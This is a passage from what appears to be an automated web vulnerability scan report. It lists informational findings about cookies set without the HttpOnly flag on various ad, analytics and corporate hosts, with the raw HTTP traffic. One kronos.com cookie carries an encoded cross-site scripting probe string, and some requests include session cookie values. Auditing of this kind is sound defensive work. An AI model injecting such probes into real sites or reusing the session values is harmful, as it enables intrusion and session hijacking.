Set-Cookie: bwuid=bw_4db5835aac8a9; expires=Thu, 19-Apr-2012 14:21:14 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3634

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.56. http://bw.pronto.ru/brick/5/167/36/30/24/&rnd=252896795 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brick/5/167/36/30/24/&rnd=252896795

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db5835764628; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/24/&rnd=252896795 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835764628; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3746

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.57. http://bw.pronto.ru/brick/5/167/36/30/26/&rnd=556115021 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brick/5/167/36/30/26/&rnd=556115021

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db583576afa9; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/26/&rnd=556115021 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583576afa9; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3630

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.58. http://bw.pronto.ru/brick/5/167/36/30/28/&rnd=128924368 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brick/5/167/36/30/28/&rnd=128924368

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db58357b45ff; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/28/&rnd=128924368 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b45ff; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.59. http://bw.pronto.ru/brick/5/167/36/30/29/&rnd=443104168 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brick/5/167/36/30/29/&rnd=443104168

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db58357b76a4; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/29/&rnd=443104168 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b76a4; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.60. http://bw.pronto.ru/brick/5/167/36/30/37/&rnd=179025170 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brick/5/167/36/30/37/&rnd=179025170

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db583576b38c; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/37/&rnd=179025170 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583576b38c; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 2774

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.61. http://bw.pronto.ru/brick/5/167/36/30/44/&rnd=3108367 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brick/5/167/36/30/44/&rnd=3108367

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db583577059f; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/44/&rnd=3108367 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583577059f; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 2774

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.62. http://bw.pronto.ru/brickgrid/5/167/36/30/138/29/&rnd=808462191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brickgrid/5/167/36/30/138/29/&rnd=808462191

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db58357ab1f6; expires=Wed, 25-May-2011 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/138/29/&rnd=808462191 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357ab1f6; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.63. http://bw.pronto.ru/brickgrid/5/167/36/30/236/49/&rnd=44849087 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brickgrid/5/167/36/30/236/49/&rnd=44849087

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db58357e2452; expires=Wed, 25-May-2011 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/236/49/&rnd=44849087 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357e2452; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3518

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.64. http://bw.pronto.ru/brickgrid/5/167/36/30/30/15/&rnd=555318316 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brickgrid/5/167/36/30/30/15/&rnd=555318316

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db58357b862a; expires=Wed, 25-May-2011 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/30/15/&rnd=555318316 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b862a; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 10059

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.65. http://bw.pronto.ru/brickgrid/5/167/36/30/31/16/&rnd=189356183 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bw.pronto.ru
Path:	/brickgrid/5/167/36/30/31/16/&rnd=189356183

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bwuid=bw_4db5835767516; expires=Wed, 25-May-2011 14:21:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/31/16/&rnd=189356183 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835767516; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.66. https://checkout.netsuite.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.67. http://core1.node15.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core1.node15.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.68. http://core2.node12.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core2.node12.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.69. http://count.rbc.ru/p712.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://count.rbc.ru
Path:	/p712.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=wrokyk21hKoDJPTuDHE4Ag==; expires=Tue, 24-Apr-12 14:26:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p712.gif?r=&width=1920&height=1200&hash=&rn=0.2250832160934806 HTTP/1.1
Host: count.rbc.ru
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:26:50 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Expires: Mon, 25 Apr 2011 14:26:49 GMT
Cache-Control: no-cache
Set-Cookie: UID=wrokyk21hKoDJPTuDHE4Ag==; expires=Tue, 24-Apr-12 14:26:50 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="NON CURa ADMa DEVa OUR IND UNI COM NAV LOC"

GIF89a.............!.......,...........L..;

16.70. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.71. https://customer.kronos.com/user/forgotpassword.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotpassword.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.72. https://customer.kronos.com/user/forgotusername.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotusername.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.73. https://customer.kronos.com/user/logindenied.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/logindenied.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.74. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.75. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fc.ef.d4.cf.bd.a1.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.76. http://goods.adnectar.com/analytics/get_avia_js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/analytics/get_avia_js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.77. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.78. http://ideco-software.ru/products/ims/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ideco-software.ru
Path:	/products/ims/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16.79. http://imagesrv.gartner.com/cio/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imagesrv.gartner.com
Path:	/cio/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=0e579c5f976d24a5c926f7f3b7d6a05cfcbcedc8689d66614db564e2; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cio/css/main.css;pv0bc766061b78d383 HTTP/1.1
Host: imagesrv.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Thu, 10 Feb 2011 15:31:18 GMT
ETag: "pv0bc766061b78d383b704fc4b546e71f0"
Expires: Sat, 15 Oct 2011 01:53:05 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.U71F6CC0A].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 2975
Set-Cookie: TS83f541=0e579c5f976d24a5c926f7f3b7d6a05cfcbcedc8689d66614db564e2; Path=/
Content-Length: 7018

body form#formName3 {width: none;}
body #menubar {width: 0; padding-right: 14px;}
#tribanner { background: url(/images/tertiary_header_bkg.jpg) no-repeat; width: 990px; height:90px; }
#tribanner h
...[SNIP]...

16.80. http://imagesrv.gartner.com/js/utility_tech.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imagesrv.gartner.com
Path:	/js/utility_tech.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS83f541=9116be29a30d782a8a47de6d68ae74f8d1b126f0043c06c64db564e2; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility_tech.js;pv8fee1c55d3d4ff57 HTTP/1.1
Host: imagesrv.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Thu, 12 Aug 2010 18:59:21 GMT
ETag: "pv8fee1c55d3d4ff5738b077a5af527bc3"
Expires: Sat, 15 Oct 2011 01:46:10 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.UF576D692].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 1314
Set-Cookie: TS83f541=9116be29a30d782a8a47de6d68ae74f8d1b126f0043c06c64db564e2; Path=/
Content-Length: 2675

// JavaScript Document
// POPUP FUNCTIONS (NEED FOR OTHER FUNCTIONS TO WORK)
function rawPopUp(url, width, height, features, target) {

// main raw popup
// written by Peter Mahnke 20 May 2
...[SNIP]...

16.81. http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kronos.d1.sc.omtrdc.net
Path:	/b/ss/kronos-dev/1/H.22.1/s64896461574826

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26DABC1D85079987-60000101000062A7[CE]; Expires=Sat, 23 Apr 2016 13:33:47 GMT; Domain=kronos.d1.sc.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

